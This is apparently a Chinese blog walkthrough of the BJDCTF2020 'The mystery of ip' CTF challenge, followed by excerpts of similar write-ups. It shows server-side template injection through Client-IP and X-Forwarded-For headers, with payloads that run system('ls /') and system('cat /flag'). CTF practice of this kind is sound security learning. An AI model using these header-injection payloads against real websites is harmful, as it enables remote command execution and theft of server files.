[BJDCTF2020]The mystery of ip

原创 于 2025-09-01 10:53:38 发布 · 196 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#http头 #服务器端模板注入ssti

启动靶机,点击flag,出现我的IP地址

在 http头添加 client-ip: 1.1.1.1      发现可以更改返回的ip

尝试  client-ip: 1.1.1.1;{7*7}        返回49,说明存在服务器端模板注入SSTI 

(其实还尝试一下xss,发现也存在。但不知道怎么利用)

client-ip: 1.1.1.1;{system("ls  /")}       在根目录发现了 flag

client-ip: 1.1.1.1;{system("cat  /flag")} 

找到了flag{1846df37-567f-4f01-8b77-a091ce7a3356}

BUUCTF——[BJDCTF2020]The mystery of ip
m_de_g的博客
04-25 585
思路真的很重要,没有这个XFF注入的话,我根本解决不了这道题目,还去.Ds_store里面绕半天,一直在错误里老半天,自己又很累,又解决不出来问题。
buuctf-[BJDCTF2020]The mystery of ip
qq_42728977的博客
12-23 1559
[BJDCTF2020]The mystery of ip考点复现参考 考点 模板注入 复现 看到提示,说是怎么知道我的ip,那就说明应该是该请求,然后模板注入,然后发现果然是。 在请求加入X-Forwarded-For: GET /flag.php HTTP/1.1 Host: node4.buuoj.cn:28006 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 A
[BJDCTF2020]The mystery of ip1
m0_73673698的博客
06-16 419
然后在尝试a{*comment*}b和{{7*7}},如果a{*comment*}b返回ab的话就是smarty模板,尝试(这里{**}是注释符的意思,所以会直接被省略)利用{if}标签来进行注入,在XFF处输入{if phpinfo()}{/if},可以看到成功执行。看一下flag页面返回了咱们的ip,那么接下来burpsuite抓包,构造XFF然后进行判断。发现存在ssti注入漏洞,然后进行判断是什么模板,上张图。发现在根目录存在flag,cat /flag得到flag。
BUUCTF—[BJDCTF2020]The mystery of ip
2301_76227305的博客
09-04 818
主要涉及的知识点是XFF注入,还有Twig模板注入,通过这题又学到2个新的知识点。这个系列的文章主要是记录一些做过的CTF的题目,以此来记录学过的知识点,俗话说好记性不如烂笔,希望这系列的文章对我有帮助,也对大家有帮助。
BUU43 [BJDCTF2020]The mystery of ip 1
2401_86190146的博客
03-03 405
实际用途就是伪造ip地址,比如说访问某些只有特定ip才能访问的网站的时候,如果伪造XFF地址就能骗过服务器进而访问。如果请求经过多个代理,该字段会按照顺序依次记录每个客户端和代理的 IP 地址,用逗号分隔,如。先修改X-Forwarded-For字段的值,发现可以修改,存在XFF注入。当客户端请求经过代理服务器时,代理服务器会将客户端的 IP 地址添加到。修改字段为{1+1},发现存在SSTI注入。转发后,服务器接收到的请求中。例如,当客户端 IP 为。搞错了,再来,直接简单粗暴。,请求经过代理服务器。
【BUUCTF】[BJDCTF2020]The mystery of ip
int_encourage的博客
06-06 294
摘要:本题通过X-Forwarded-For进行IP伪造,利用Twig模板注入漏洞(SSTI)执行系统命令。在Flag页面伪造X-Forwarded-For为{{system('ls /')}}列出根目录文件,发现flag文件后,使用{{system('cat /fl*')}}读取flag内容成功。解题关键在于识别IP显示功能的模板注入漏洞,并通过HTTP注入恶意模板代码获取系统权限。
BUUCTF [BJDCTF2020] The mystery of ip
Senimo
12-19 2739
BUUCTF [BJDCTF2020] The mystery of ip 考点: X-Forwarded-For注入 PHP可能存在Twig模版注入漏洞 启动环境: 查看flag页面: 查看hint页面: 结合题目名,IP的秘密,flag页面也出现了IP,猜测为X-Forwarded-For处有问题 使用BurpSuite抓取数据包: 添加HTTP请求: X-Forwarded-For: 1 发送数据包,得到回显页面: 被成功执行,说明XFF可控,测试了半天,因为是php页面,所以没想
BUU [BJDCTF2020]The mystery of ip
Jay17的博客
07-30 328
BUU [BJDCTF2020]The mystery of ip
[BJDCTF2020]The mystery of ip 1
qq_43618536的博客
07-04 1005
BUUCTF的[BJDCTF2020]The mystery of ip 1
[BJDCTF2020]The mystery of ipssti模板注入题目)
m0_55109452的博客
06-02 2051
项目场景: 链接http://node3.buuoj.cn:29669/index.php 问题描述: 观察页面找到三个链接,点开flag和hint看看,发现flag那个页面窃取了客户端的ip地址,这题的题目是“The mystery of ipIP的神秘,看来解题是要从这里入手了。 尝试解决: 既然是窃取了IP,考虑是不是XFF或Client-IP这两个header,发现这个IP确实可控,0.0,感觉可以冲了 我想到的第一个就是之前看到的sql注入http注入,但是也只是想想罢了,再看看其他方
[bjdctf2020]the mystery of ip
03-16
这是一道关于IP地址的谜题,需要我们了解IP地址的基本知识和相关的网络协议。通过分析题目中给出的IP地址和端口号,我们可以推测出这是一道关于TCP/IP协议的题目。我们需要使用Wireshark等网络抓包工具来捕获网络...
【学习笔记 37】 buu [BJDCTF2020]The mystery of ip
weixin_43553654的博客
08-01 455
0x00 知识点 tplmap探测是否存在模板注入漏洞 smartly模板注入 0x01 知识点详解 tplmap的使用方法? 答:这里只用到python tplmap.py -u 'curl',想了解详情的话这里附上一篇大佬的博客。 什么是smartly模板引擎注入? 答:这里参考这篇文章 解题思路 打开网站一看 就看到了他提示的flag,那还不点开看看 提示到了我的IP,这一瞬间就让我想到了http的请求里的XXF参数和Client-ip参数,想了解http请求详情的请去看我的上一篇文
人事人才网网络会员协议书范本.doc
最新发布
09-04
人事人才网网络会员协议书范本.doc
深度学习驱动的图像信息智能处理系统架构与应用范式研究.docx
09-04
深度学习驱动的图像信息智能处理系统架构与应用范式研究.docx
一轮复习人教A版-第十一章-11.1-算法与程序框图-课件(65张).pptx
09-04
一轮复习人教A版-第十一章-11.1-算法与程序框图-课件(65张).pptx
大学计算机信息基础实验教学大纲.docx
09-04
大学计算机信息基础实验教学大纲.docx
物联网应用场景解决方案(综合版).pptx
09-04
物联网应用场景解决方案(综合版).pptx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值